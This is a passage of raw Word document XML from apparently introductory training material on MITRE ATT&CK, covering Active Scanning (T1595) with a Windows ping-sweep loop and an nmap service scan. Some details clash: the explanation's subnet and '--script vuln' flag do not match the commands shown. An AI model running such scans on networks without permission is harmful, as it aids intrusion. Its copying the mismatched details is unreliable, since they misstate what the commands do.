            <w:r w:rsidRPr="00D60AEC">
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04D01B4C" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EB3D7D9" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>TA0040</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="146C843D" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
            <w:r w:rsidRPr="00D60AEC">
              <w:t>Destroy, disrupt, or encrypt data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21C7E39B" w14:textId="77777777" w:rsidR="00AB41A4" w:rsidRDefault="00AB41A4" w:rsidP="00AB41A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="461B9495" w14:textId="77777777" w:rsidR="00AB41A4" w:rsidRDefault="00AB41A4" w:rsidP="00AB41A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03BAC6F6" w14:textId="77777777" w:rsidR="00AB41A4" w:rsidRDefault="00AB41A4" w:rsidP="00AB41A4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52527E73" w14:textId="2B1FF305" w:rsidR="00AB41A4" w:rsidRPr="00E817BE" w:rsidRDefault="00AB41A4" w:rsidP="00AB41A4">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Key Concepts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C9D4B9" w14:textId="77777777" w:rsidR="00AB41A4" w:rsidRPr="00E817BE" w:rsidRDefault="00AB41A4" w:rsidP="00AB41A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Technique: How the attacker achieves a tactic. (Example: Phishing is a way to achieve Initial Access.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F299F7" w14:textId="77777777" w:rsidR="00AB41A4" w:rsidRPr="00E817BE" w:rsidRDefault="00AB41A4" w:rsidP="00AB41A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Procedure: The exact, real-world steps or tools an attacker uses to carry out a technique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540993FD" w14:textId="77777777" w:rsidR="00AB41A4" w:rsidRPr="00E817BE" w:rsidRDefault="00AB41A4" w:rsidP="00AB41A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Sub-technique: A more specific version of a technique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7F231C" w14:textId="77777777" w:rsidR="00AB41A4" w:rsidRPr="00E817BE" w:rsidRDefault="00AB41A4" w:rsidP="00AB41A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Indicators of Compromise (IOCs): Signs that suggest an attack is underway or already happened (suspicious IPs, strange files, unusual login activity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E72A69D" w14:textId="77777777" w:rsidR="00AB41A4" w:rsidRPr="00E817BE" w:rsidRDefault="00AB41A4" w:rsidP="00AB41A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Motivation: The reason for attacking. Most often financial, sometimes for espionage, sabotage, or political disruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA6352B" w14:textId="77777777" w:rsidR="00AB41A4" w:rsidRDefault="00AB41A4" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EC129AB" w14:textId="23C8C04A" w:rsidR="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Technique 1: Active Scanning</w:t>
      </w:r>
      <w:r w:rsidR="00AB41A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00AB41A4" w:rsidRPr="00AB41A4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB41A4" w:rsidRPr="00E817BE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network Scanning</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (T1595)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFBBD58" w14:textId="505F53BC" w:rsidR="00AB41A4" w:rsidRPr="00D60AEC" w:rsidRDefault="00AB41A4" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00E817BE">
        <w:t>Attackers use automated tools to find what computers are present and what they’re running—like a burglar rattling every doorknob in a street.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7368585D" w14:textId="163193AD" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Technique: Active Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0512E06C" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MITRE ID:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> T1595</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403853CB" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Associated Tactic(s):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF3744D" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Reconnaissance (TA0043)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C19AD8" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Discovery (TA0007)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A19CF6A" w14:textId="2E7FB3DF" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Resource Development (TA0042)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B36F63E" w14:textId="68408238" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is Active Scanning?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76916F1A" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve">Active Scanning is when attackers </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>actively probe or scan</w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> a target system or network to find information that helps them plan their next steps. It’s like a thief checking which houses have unlocked doors or weak locks — without breaking in yet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44603CB2" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:t>They look for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B054312" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Live systems (which computers are turned on)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EACB2D" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Open ports (like doors into the system)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71815BAE" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Services (like web servers, email servers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA7165A" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Software versions (to look for known bugs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47114327" w14:textId="7557908C" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC"/>
    <w:p w14:paraId="7C49FB71" w14:textId="12A7E8DA" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedure 1.1: Ping Sweep to Discover Devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F513B4F" w14:textId="5D110EA1" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Goal:</w:t>
      </w:r>
      <w:r w:rsidR="00041292">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Find all the devices that are “alive” (online) in a local network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5D23CF" w14:textId="634FC7FB" w:rsidR="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Command (Windows):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223CAECD" w14:textId="77777777" w:rsidR="00AB41A4" w:rsidRPr="00E817BE" w:rsidRDefault="00AB41A4" w:rsidP="00AB41A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>The attacker selects a target network range (say, 192.168.10.1-192.168.10.254).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0AAC24" w14:textId="77777777" w:rsidR="00AB41A4" w:rsidRDefault="00AB41A4" w:rsidP="00AB41A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>They use a simple command or script to send a ping to every IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5BA50E" w14:textId="77777777" w:rsidR="00AB41A4" w:rsidRPr="00D60AEC" w:rsidRDefault="00AB41A4" w:rsidP="00AB41A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Example Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D7D6E3" w14:textId="77777777" w:rsidR="00AB41A4" w:rsidRPr="00D60AEC" w:rsidRDefault="00AB41A4" w:rsidP="00AB41A4">
      <w:r w:rsidRPr="00D60AEC">
        <w:t>for /L %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> in (1,1,254) do @ping -n 1 -w 200 192.168.1.%i &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>nul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve"> &amp;&amp; echo 192.168.1.%i is alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FFE095" w14:textId="169D9C23" w:rsidR="00AB41A4" w:rsidRPr="00E817BE" w:rsidRDefault="00AB41A4" w:rsidP="00AB41A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Devices that answer are recorded (the “doors” that seem open).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E214822" w14:textId="57891914" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD93937" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>This loops through all IPs from .1 to .254</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6174A601" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Pings each IP once (-n 1) with a timeout (-w 200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531168F3" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>If there’s a reply, it prints the IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E43B00" w14:textId="1BCEDB88" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidR="001D5AD4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>The attacker gets a list of all the IP addresses in the local network that are turned on and responding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B869F5" w14:textId="28B4EB72" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedure 1.2: Using Nmap to Find Vulnerable Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4B2C39" w14:textId="69C8B81C" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Goal:</w:t>
      </w:r>
      <w:r w:rsidR="001D5AD4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Find which services are running and whether they’re vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF38388" w14:textId="77777777" w:rsidR="00AB41A4" w:rsidRPr="00E817BE" w:rsidRDefault="00AB41A4" w:rsidP="00AB41A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>The attacker uses a tool like Nmap to scan for open “doors” on those live devices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F09B6E5" w14:textId="77777777" w:rsidR="00AB41A4" w:rsidRPr="00E817BE" w:rsidRDefault="00AB41A4" w:rsidP="00AB41A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>Example Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BA5BC3" w14:textId="77777777" w:rsidR="00AB41A4" w:rsidRPr="00E817BE" w:rsidRDefault="00AB41A4" w:rsidP="00AB41A4">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E817BE">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E817BE">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E817BE">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E817BE">
        <w:t xml:space="preserve"> 192.168.10.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325F2953" w14:textId="77777777" w:rsidR="00AB41A4" w:rsidRPr="00E817BE" w:rsidRDefault="00AB41A4" w:rsidP="00AB41A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E817BE">
        <w:t>The scan shows open ports and which software/devices/services are running—helping find weak spots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177A207D" w14:textId="71ADEC38" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433D2271" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>: Detect service versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5F2A63" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>--script vuln: Use built-in vulnerability scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033CC1CD" w14:textId="300980B7" w:rsidR="001D5AD4" w:rsidRPr="00AB41A4" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>192.168.1.0/24: Scan all devices in this subnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E065E54" w14:textId="544C03DB" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidR="00501A9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Nmap will show:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055DA7BE" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Open ports (e.g., port 80 = HTTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F8D4CD" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>What software is running (e.g., Apache 2.4.49)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE85C76" w14:textId="36F7BF3B" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Any known CVEs or weaknesses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2FE98B" w14:textId="3A902112" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why Attackers Use This</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1F48B2" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t xml:space="preserve">They </w:t>
      </w:r>
      <w:r w:rsidRPr="00D60AEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>map the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3734AE47" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRPr="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:t>Identify weak points (e.g., outdated software, unnecessary open ports)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0EBCEB" w14:textId="77777777" w:rsidR="00D60AEC" w:rsidRDefault="00D60AEC" w:rsidP="00D60AEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D60AEC">
        <w:lastRenderedPageBreak/>
        <w:t>Plan the next attack step (like exploiting a vulnerable service)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AE38B4" w14:textId="77777777" w:rsidR="00AB41A4" w:rsidRPr="00E817BE" w:rsidRDefault="00AB41A4" w:rsidP="00AB41A4">
      <w:r w:rsidRPr="00E817BE">
        <w:t>Indicators of Compromise:</w:t>
